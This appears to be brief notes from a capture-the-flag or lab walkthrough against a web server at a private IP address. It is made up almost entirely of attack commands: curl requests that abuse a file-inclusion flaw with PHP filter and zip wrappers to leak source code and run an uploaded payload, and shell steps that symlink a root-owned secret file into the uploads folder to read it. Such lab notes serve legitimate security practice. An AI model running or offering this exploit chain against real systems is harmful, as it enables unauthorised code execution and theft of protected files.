80

curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=home --path-as-is
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=home --path-as-is | base64 -d > home.html
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=upload --path-as-is | base64 -d > upload.php
curl http://192.168.182.229/index.php?file=zip://uploads/upload_1723720412.zip%23payload

We don't mention .php here because it seems .php is appended to the filename.

cd /var/www/html/uploads
touch @root.zip
ln -s /root/secret root.zip

Last updated